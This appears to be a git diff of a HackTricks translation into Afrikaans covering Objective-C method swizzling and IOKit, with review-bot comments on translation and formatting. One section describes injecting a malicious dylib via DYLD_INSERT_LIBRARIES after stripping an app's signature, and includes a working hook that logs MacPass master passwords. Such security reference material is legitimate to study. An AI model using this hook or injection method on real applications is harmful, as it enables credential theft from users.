volg, is dit moontlik om 'n **array van metodes** te bereik waar die **name** en **pointer** na die metodekode **geleë** is. 
{% hint style="danger" %} -Note that because methods and classes are accessed based on their names, this information is store in the binary, so it's possible to retrieve it with `otool -ov ` or [`class-dump `](https://github.com/nygard/class-dump) +Let daarop dat omdat metodes en klasse gebaseer word op hul name, hierdie inligting in die binêre lêer gestoor word, so dit is moontlik om dit te herwin met `otool -ov ` of [`class-dump `](https://github.com/nygard/class-dump) {% endhint %} -### Accessing the raw methods - -It's possible to access the information of the methods such as name, number of params or address like in the following example: +### Toegang tot die rou metodes +Dit is moontlik om die inligting van die metodes soos naam, aantal parameters of adres te bekom, soos in die volgende voorbeeld: ```objectivec // gcc -framework Foundation test.m -o test 
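Review bot: the danger hint changes meaning slightly: "because methods and classes are **accessed** based on their names" became "omdat metodes en klasse gebaseer word op hul name" ("are based on their names"), dropping the point that name-based lookup is why the names must be stored in the binary. Suggest "omdat metodes en klasse op grond van hul name opgesoek word". In the preceding paragraph "die **name** en **pointer** na die metodekode" should be plural ("pointers" or "wysers") to match "names". Formatting: `+## Metode Swizzling` is glued to the closing ``` fence, and the blank line between "soos in die volgende voorbeeld:" and the ```objectivec fence was removed; restore both blank lines.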
@@ -119,72 +178,70 @@ It's possible to access the information of the methods such as name, number of p #import int main() { - // Get class of the variable - NSString* str = @"This is an example"; - Class strClass = [str class]; - NSLog(@"str's Class name: %s", class_getName(strClass)); +// Get class of the variable +NSString* str = @"This is an example"; +Class strClass = [str class]; +NSLog(@"str's Class name: %s", class_getName(strClass)); - // Get parent class of a class - Class strSuper = class_getSuperclass(strClass); - NSLog(@"Superclass name: %@",NSStringFromClass(strSuper)); +// Get parent class of a class +Class strSuper = class_getSuperclass(strClass); +NSLog(@"Superclass name: %@",NSStringFromClass(strSuper)); - // Get information about a method - SEL sel = @selector(length); - NSLog(@"Selector name: %@", NSStringFromSelector(sel)); - Method m = class_getInstanceMethod(strClass,sel); - NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m)); - NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m)); +// Get information about a method +SEL sel = @selector(length); +NSLog(@"Selector name: %@", NSStringFromSelector(sel)); +Method m = class_getInstanceMethod(strClass,sel); +NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m)); +NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m)); - // Iterate through the class hierarchy - NSLog(@"Listing methods:"); - Class currentClass = strClass; - while (currentClass != NULL) { - unsigned int inheritedMethodCount = 0; - Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); - - NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount); - - for (unsigned int i = 0; i < inheritedMethodCount; i++) { - Method method = inheritedMethods[i]; - SEL selector = method_getName(method); - const char* methodName = sel_getName(selector); - unsigned long address = (unsigned 
long)method_getImplementation(m); - NSLog(@"Inherited method name: %s (0x%lx)", methodName, address); - } - - // Free the memory allocated by class_copyMethodList - free(inheritedMethods); - currentClass = class_getSuperclass(currentClass); - } +// Iterate through the class hierarchy +NSLog(@"Listing methods:"); +Class currentClass = strClass; +while (currentClass != NULL) { +unsigned int inheritedMethodCount = 0; +Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); - // Other ways to call uppercaseString method - if([str respondsToSelector:@selector(uppercaseString)]) { - NSString *uppercaseString = [str performSelector:@selector(uppercaseString)]; - NSLog(@"Uppercase string: %@", uppercaseString); - } +NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount); - // Using objc_msgSend directly - NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString)); - NSLog(@"Uppercase string: %@", uppercaseString2); +for (unsigned int i = 0; i < inheritedMethodCount; i++) { +Method method = inheritedMethods[i]; +SEL selector = method_getName(method); +const char* methodName = sel_getName(selector); +unsigned long address = (unsigned long)method_getImplementation(m); +NSLog(@"Inherited method name: %s (0x%lx)", methodName, address); +} - // Calling the address directly - IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address - NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp - NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method - NSLog(@"Uppercase string: %@", uppercaseString3); +// Free the memory allocated by class_copyMethodList +free(inheritedMethods); +currentClass = class_getSuperclass(currentClass); +} - return 0; +// Other ways to call uppercaseString method +if([str 
respondsToSelector:@selector(uppercaseString)]) { +NSString *uppercaseString = [str performSelector:@selector(uppercaseString)]; +NSLog(@"Uppercase string: %@", uppercaseString); +} + +// Using objc_msgSend directly +NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString)); +NSLog(@"Uppercase string: %@", uppercaseString2); + +// Calling the address directly +IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address +NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp +NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method +NSLog(@"Uppercase string: %@", uppercaseString3); + +return 0; } ``` +### Metode Swizzling met method\_exchangeImplementations -### Method Swizzling with method\_exchangeImplementations - -The function **`method_exchangeImplementations`** allows to **change** the **address** of the **implementation** of **one function for the other**. +Die funksie **`method_exchangeImplementations`** maak dit moontlik om die **adres** van die **implementering** van een funksie te **verander** na die ander. {% hint style="danger" %} -So when a function is called what is **executed is the other one**. +Dus, wanneer 'n funksie geroep word, word die ander een **uitgevoer**. {% endhint %} - ```objectivec //gcc -framework Foundation swizzle_str.m -o swizzle_str 
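Review bot: since this hunk rewrites every line of the loop anyway, it is the place to fix the pre-existing bug it carries over: inside `for (unsigned int i = 0; i < inheritedMethodCount; i++)` the line `unsigned long address = (unsigned long)method_getImplementation(m);` uses the outer `m` (the `length` method fetched earlier) instead of the loop variable `method`, so every inherited method is printed with the same implementation address. It should be `method_getImplementation(method)`. Beyond that, the whole block has its indentation stripped (`-    NSString* str = @"This is an example";` to `+NSString* str = ...`), which is the same whitespace regression as in the other code hunks; the heading `+### Metode Swizzling met method\_exchangeImplementations` abuts the closing fence; and the blank line before the next ```objectivec fence was removed.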
@@ -202,45 +259,43 @@ So when a function is called what is **executed is the other one**. @implementation NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { - NSLog(@"Custom implementation of substringFromIndex:"); - - // Call the original method - return [self swizzledSubstringFromIndex:from]; +NSLog(@"Custom implementation of substringFromIndex:"); + +// Call the original method +return [self swizzledSubstringFromIndex:from]; } @end int main(int argc, const char * argv[]) { - // Perform method swizzling - Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:)); - Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:)); - method_exchangeImplementations(originalMethod, swizzledMethod); +// Perform method swizzling +Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:)); +Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:)); +method_exchangeImplementations(originalMethod, swizzledMethod); - // We changed the address of one method for the other - // Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex - // And when swizzledSubstringFromIndex is called, substringFromIndex is really colled - - // Example usage - NSString *myString = @"Hello, World!"; - NSString *subString = [myString substringFromIndex:7]; - NSLog(@"Substring: %@", subString); - - return 0; +// We changed the address of one method for the other +// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex +// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled + +// Example usage +NSString *myString = @"Hello, World!"; +NSString *subString = [myString substringFromIndex:7]; +NSLog(@"Substring: %@", subString); + +return 0; } ``` - {% hint style="warning" %} -In 
this case if the **implementation code of the legit** method **verifies** the **method** **name** it could **detect** this swizzling and prevent it from running. +In hierdie geval, as die **implementasie-kode van die regmatige** metode die **metode-naam** **verifieer**, kan dit hierdie swizzling opspoor en voorkom dat dit uitgevoer word. -The following technique doesn't have this restriction. +Die volgende tegniek het nie hierdie beperking nie. {% endhint %} -### Method Swizzling with method\_setImplementation +### Metode Swizzling met method\_setImplementation -The previous format is weird because you are changing the implementation of 2 methods one from the other. Using the function **`method_setImplementation`** you can **change** the **implementation** of a **method for the other one**. - -Just remember to **store the address of the implementation of the original one** if you are going to to call it from the new implementation before overwriting it because later it will be much complicated to locate that address. +Die vorige formaat is vreemd omdat jy die implementasie van 2 metodes verander, een van die ander. Deur die funksie **`method_setImplementation`** te gebruik, kan jy die implementasie van 'n metode **verander vir die ander**. +Onthou net om die adres van die implementasie van die oorspronklike een te **stoor** as jy dit van die nuwe implementasie gaan oproep voordat jy dit oorskryf, want later sal dit baie moeilik wees om daardie adres te vind. ```objectivec #import #import 
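Review bot: The `+` line `// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled` keeps the typo `colled` even though the line is rewritten in this hunk; change it to `called`. The same hunk flattens the whole `swizzledSubstringFromIndex:` body and `main` to column 0 (`+NSLog(...)`, `+Method originalMethod = ...`), which is unrelated to the translation and should be reverted. In the translated prose, `as jy dit van die nuwe implementasie gaan oproep` reads better as `as jy dit vanuit die nuwe implementasie gaan aanroep`, and the blank lines that separated the closing fence from `{% hint style="warning" %}` and the heading from its paragraph were removed; keep them for readability.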
@@ -257,63 +312,60 @@ static IMP original_substringFromIndex = NULL; @implementation NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { - NSLog(@"Custom implementation of substringFromIndex:"); - - // Call the original implementation using objc_msgSendSuper - return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from); +NSLog(@"Custom implementation of substringFromIndex:"); + +// Call the original implementation using objc_msgSendSuper +return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from); } @end int main(int argc, const char * argv[]) { - @autoreleasepool { - // Get the class of the target method - Class stringClass = [NSString class]; - - // Get the swizzled and original methods - Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); - - // Get the function pointer to the swizzled method's implementation - IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:))); - - // Swap the implementations - // It return the now overwritten implementation of the original method to store it - original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); - - // Example usage - NSString *myString = @"Hello, World!"; - NSString *subString = [myString substringFromIndex:7]; - NSLog(@"Substring: %@", subString); - - // Set the original implementation back - method_setImplementation(originalMethod, original_substringFromIndex); - - return 0; - } +@autoreleasepool { +// Get the class of the target method +Class stringClass = [NSString class]; + +// Get the swizzled and original methods +Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); + +// Get the function pointer to the swizzled method's implementation +IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, 
@selector(swizzledSubstringFromIndex:))); + +// Swap the implementations +// It return the now overwritten implementation of the original method to store it +original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); + +// Example usage +NSString *myString = @"Hello, World!"; +NSString *subString = [myString substringFromIndex:7]; +NSLog(@"Substring: %@", subString); + +// Set the original implementation back +method_setImplementation(originalMethod, original_substringFromIndex); + +return 0; +} } ``` +## Hooking Aanval Metodologie -## Hooking Attack Methodology +Op hierdie bladsy is verskillende maniere bespreek om funksies te haker. Dit betrek egter **die uitvoering van kode binne die proses om aan te val**. -In this page different ways to hook functions were discussed. However, they involved **running code inside the process to attack**. +Om dit te doen, is die maklikste tegniek om 'n [Dyld via omgewingsveranderlikes of kaping](../macos-dyld-hijacking-and-dyld\_insert\_libraries.md) in te spuit. Ek vermoed egter dat dit ook gedoen kan word deur [Dylib-prosesinjeksie](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port). -In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](../macos-dyld-hijacking-and-dyld\_insert\_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port). +Beide opsies is egter **beperk** tot **onbeskermde** binnerwerke/prosesse. Kyk na elke tegniek om meer te leer oor die beperkings. -However, both options are **limited** to **unprotected** binaries/processes. Check each technique to learn more about the limitations. - -However, a function hooking attack is very specific, an attacker will do this to **steal sensitive information from inside a process** (if not you would just do a process injection attack). 
And this sensitive information might be located in user downloaded Apps such as MacPass. - -So the attacker vector would be to either find a vulnerability or strip the signature of the application, inject the **`DYLD_INSERT_LIBRARIES`** env variable through the Info.plist of the application adding something like: +'n Funksie-hakeraanval is egter baie spesifiek, 'n aanvaller sal dit doen om **gevoelige inligting uit 'n proses te steel** (as jy nie dit sou doen nie, sou jy net 'n prosesinjeksie-aanval doen). En hierdie gevoelige inligting kan in gebruikers afgelaaide programme soos MacPass wees. +Die aanvaller se vektor sou dus wees om óf 'n kwesbaarheid te vind óf die handtekening van die toepassing te verwyder, die **`DYLD_INSERT_LIBRARIES`** omgewingsveranderlike deur die Info.plist van die toepassing in te spuit en iets soos die volgende by te voeg: ```xml LSEnvironment - DYLD_INSERT_LIBRARIES - /Applications/Application.app/Contents/malicious.dylib +DYLD_INSERT_LIBRARIES +/Applications/Application.app/Contents/malicious.dylib ``` - -and then **re-register** the application: +en registreer dan die toepassing **weer**: {% code overflow="wrap" %} ```bash @@ -321,14 +373,13 @@ and then **re-register** the application: ``` {% endcode %} -Add in that library the hooking code to exfiltrate the information: Passwords, messages... +Voeg in daardie biblioteek die hooking-kode by om die inligting uit te skakel: Wagwoorde, boodskappe... {% hint style="danger" %} -Note that in newer versions of macOS if you **strip the signature** of the application binary and it was previously executed, macOS **won't be executing the application** anymore. +Let daarop dat in nuwer weergawes van macOS, as jy die handtekening van die toepassingsbinêre lêer **verwyder** en dit voorheen uitgevoer is, sal macOS die toepassing **nie meer uitvoer nie**. {% endhint %} -#### Library example - +#### Biblioteekvoorbeeld ```objectivec // gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib 
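Review bot: The comment `// Call the original implementation using objc_msgSendSuper` in the `swizzledSubstringFromIndex:` body is inaccurate: the line below it calls the saved `original_substringFromIndex` IMP directly through a cast, and nothing in the block uses `objc_msgSendSuper`; since the line is re-emitted here, change it to `// Call the original implementation through the saved IMP` (and `// It return the now overwritten implementation` to `returns`). Two mistranslations in the prose of these hunks change the meaning: `onbeskermde binnerwerke/prosesse` renders 'binaries' as 'inner workings' and should be `onbeskermde binêre lêers/prosesse`; and `die hooking-kode by om die inligting uit te skakel` says 'to switch the information off' where the English says 'exfiltrate', so use `om die inligting te eksfiltreer`. As in the other code blocks, the indentation of the `@autoreleasepool` body and of the `LSEnvironment` plist entries (`+DYLD_INSERT_LIBRARIES` at column 0) has been stripped and should be restored.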
@@ -345,40 +396,39 @@ static IMP real_setPassword = NULL; static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL) { - // Function that will log the password and call the original setPassword(pass, file_path) method - NSLog(@"[+] Password is: %@", password); - - // After logging the password call the original method so nothing breaks. - return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL); +// Function that will log the password and call the original setPassword(pass, file_path) method +NSLog(@"[+] Password is: %@", password); + +// After logging the password call the original method so nothing breaks. +return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL); } // Library constructor to execute __attribute__((constructor)) static void customConstructor(int argc, const char **argv) { - // Get the real method address to not lose it - Class classMPDocument = NSClassFromString(@"MPDocument"); - Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); - - // Make the original method setPassword call the fake implementation one - IMP fake_IMP = (IMP)custom_setPassword; - real_setPassword = method_setImplementation(real_Method, fake_IMP); +// Get the real method address to not lose it +Class classMPDocument = NSClassFromString(@"MPDocument"); +Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); + +// Make the original method setPassword call the fake implementation one +IMP fake_IMP = (IMP)custom_setPassword; +real_setPassword = method_setImplementation(real_Method, fake_IMP); } ``` - -## References +## Verwysings * [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
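Review bot: The `sniff.m` block in this hunk has the bodies of `custom_setPassword` and `customConstructor` flattened to column 0 (`+NSLog(@"[+] Password is: %@", password);`, `+Class classMPDocument = ...`), which is a pure whitespace change in a translation PR and should be reverted; the blank line between the closing fence and `## Verwysings` was removed as well and should come back. The footer bullets themselves translate cleanly.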
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md index 38ef0db2e..5d399a231 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md @@ -2,28 +2,27 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS en HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). 
+* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-## Basic Information +## Basiese Inligting -The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware. +Die I/O Kit is 'n oopbron, objek-georiënteerde **toestuurder-raamwerk** in die XNU-kernel, wat **dinamies gelaai word toestuurders** hanteer. Dit maak dit moontlik om modulêre kode op die vlieg by die kernel te voeg, wat diverse hardeware ondersteun. -IOKit drivers will basically **export functions from the kernel**. These function parameter **types** are **predefined** and are verified. Moreover, similar to XPC, IOKit is just another layer on **top of Mach messages**. +IOKit-bestuurders sal basies **funksies uit die kernel uitvoer**. Hierdie funksieparameter **tipes** is **voorgedefinieer** en word geverifieer. Verder, soos XPC, is IOKit net nog 'n laag **bo-op Mach-boodskappe**. -**IOKit XNU kernel code** is opensourced by Apple in [https://github.com/apple-oss-distributions/xnu/tree/main/iokit](https://github.com/apple-oss-distributions/xnu/tree/main/iokit). Moreover, the user space IOKit components are also opensource [https://github.com/opensource-apple/IOKitUser](https://github.com/opensource-apple/IOKitUser). +Die **IOKit XNU-kernelkode** is deur Apple oopbron in [https://github.com/apple-oss-distributions/xnu/tree/main/iokit](https://github.com/apple-oss-distributions/xnu/tree/main/iokit). Verder is die IOKit-komponente vir gebruikersruimte ook oopbron [https://github.com/opensource-apple/IOKitUser](https://github.com/opensource-apple/IOKitUser). -However, **no IOKit drivers** are opensource. Anyway, from time to time a release of a driver might come with symbols that makes it easier to debug it. Check how to [**get the driver extensions from the firmware here**](./#ipsw)**.** - -It's written in **C++**. 
You can get demangled C++ symbols with: +Nietemin, **geen IOKit-bestuurders** is oopbron nie. In elk geval kan 'n vrystelling van 'n bestuurder van tyd tot tyd met simbole kom wat dit makliker maak om dit te foutopspoor. Kyk hoe om [**die bestuurderuitbreidings uit die firmware te kry hier**](./#ipsw)**.** +Dit is in **C++** geskryf. Jy kan gedemangelde C++-simbole kry met: ```bash # Get demangled symbols nm -C com.apple.driver.AppleJPEGDriver 
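Review bot: The first paragraph of `## Basiese Inligting` is garbled in translation: `'n oopbron, objek-georiënteerde toestuurder-raamwerk ... wat dinamies gelaai word toestuurders hanteer` uses a non-word (`toestuurder`) and a broken clause; suggest `'n oopbron, objek-georiënteerde toestelbestuurder-raamwerk in die XNU-kernel wat dinamies gelaaide toestelbestuurders hanteer`. The next paragraph switches to `IOKit-bestuurders`, and the later hunks use `drywers`; pick one term for 'driver' across the file. `Die IOKit XNU-kernelkode is deur Apple oopbron in ...` is missing its verb (`is deur Apple oopbron gemaak by ...`), and `funksies uit die kernel uitvoer` is ambiguous between 'execute' and 'export'; `funksies vanuit die kernel blootstel` keeps the English sense. Replacing the stale Spanish footer bullets with Afrikaans ones is the right call for this file.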
@@ -33,159 +32,148 @@ c++filt __ZN16IOUserClient202222dispatchExternalMethodEjP31IOExternalMethodArgumentsOpaquePK28IOExternalMethodDispatch2022mP8OSObjectPv IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) ``` - {% hint style="danger" %} -IOKit **exposed functions** could perform **additional security checks** when a client tries to call a function but note that the apps are usually **limited** by the **sandbox** to which IOKit functions they can interact with. +IOKit **blootgestelde funksies** kan **addisionele sekuriteitskontroles** uitvoer wanneer 'n kliënt probeer om 'n funksie aan te roep, maar let daarop dat die programme gewoonlik **beperk** word deur die **sandbox** waarmee IOKit funksies kan interaksie hê. {% endhint %} -## Drivers +## Bestuurders -In macOS they are located in: +In macOS is hulle geleë in: * **`/System/Library/Extensions`** - * KEXT files built into the OS X operating system. +* KEXT-lêers wat in die OS X-bedryfstelsel ingebou is. * **`/Library/Extensions`** - * KEXT files installed by 3rd party software +* KEXT-lêers wat deur derdeparty sagteware geïnstalleer is. 
-In iOS they are located in: +In iOS is hulle geleë in: * **`/System/Library/Extensions`** - ```bash #Use kextstat to print the loaded drivers kextstat Executing: /usr/bin/kmutil showloaded No variant specified, falling back to release Index Refs Address Size Wired Name (Version) UUID - 1 142 0 0 0 com.apple.kpi.bsd (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 2 11 0 0 0 com.apple.kpi.dsep (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 3 170 0 0 0 com.apple.kpi.iokit (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 4 0 0 0 0 com.apple.kpi.kasan (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 5 175 0 0 0 com.apple.kpi.libkern (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 6 154 0 0 0 com.apple.kpi.mach (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 7 88 0 0 0 com.apple.kpi.private (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 8 106 0 0 0 com.apple.kpi.unsupported (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5> - 10 12 0xffffff8003544000 0x92000 0x92000 com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1> +1 142 0 0 0 com.apple.kpi.bsd (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +2 11 0 0 0 com.apple.kpi.dsep (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +3 170 0 0 0 com.apple.kpi.iokit (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +4 0 0 0 0 com.apple.kpi.kasan (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +5 175 0 0 0 com.apple.kpi.libkern (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +6 154 0 0 0 com.apple.kpi.mach (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +7 88 0 0 0 com.apple.kpi.private (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +8 106 0 0 0 com.apple.kpi.unsupported (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5> +10 12 0xffffff8003544000 0x92000 0x92000 
com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1> ``` +Tot by nommer 9 word die gelysde drywers **gelaai in die adres 0**. Dit beteken dat dit nie werklike drywers is nie, maar **deel van die kernel en hulle kan nie gelaai word nie**. -Until the number 9 the listed drivers are **loaded in the address 0**. This means that those aren't real drivers but **part of the kernel and they cannot be unloaded**. - -In order to find specific extensions you can use: - +Om spesifieke uitbreidings te vind, kan jy gebruik maak van: ```bash kextfind -bundle-id com.apple.iokit.IOReportFamily #Search by full bundle-id kextfind -bundle-id -substring IOR #Search by substring in bundle-id ``` - -To load and unload kernel extensions do: - +Om kernel-uitbreidings te laai en te ontlas, doen die volgende: ```bash kextload com.apple.iokit.IOReportFamily kextunload com.apple.iokit.IOReportFamily ``` - ## IORegistry -The **IORegistry** is a crucial part of the IOKit framework in macOS and iOS which serves as a database for representing the system's hardware configuration and state. It's a **hierarchical collection of objects that represent all the hardware and drivers** loaded on the system, and their relationships to each other. - -You can get the IORegistry using the cli **`ioreg`** to inspect it from the console (specially useful for iOS). +Die **IORegistry** is 'n belangrike deel van die IOKit-raamwerk in macOS en iOS wat dien as 'n databasis vir die voorstelling van die stelsel se hardewarekonfigurasie en -toestand. Dit is 'n **hiërargiese versameling van voorwerpe wat al die hardeware en drywers verteenwoordig** wat op die stelsel gelaai is, en hul verhoudings met mekaar. +Jy kan die IORegistry kry deur die opdrag **`ioreg`** te gebruik om dit vanaf die konsole te ondersoek (veral nuttig vir iOS). 
```bash ioreg -l #List all ioreg -w 0 #Not cut lines ioreg -p #Check other plane ``` - -You could download **`IORegistryExplorer`** from **Xcode Additional Tools** from [**https://developer.apple.com/download/all/**](https://developer.apple.com/download/all/) and inspect the **macOS IORegistry** through a **graphical** interface. +Jy kan **`IORegistryExplorer`** aflaai vanaf **Xcode Additional Tools** by [**https://developer.apple.com/download/all/**](https://developer.apple.com/download/all/) en die **macOS IORegistry** deur middel van 'n **grafiese** koppelvlak ondersoek.
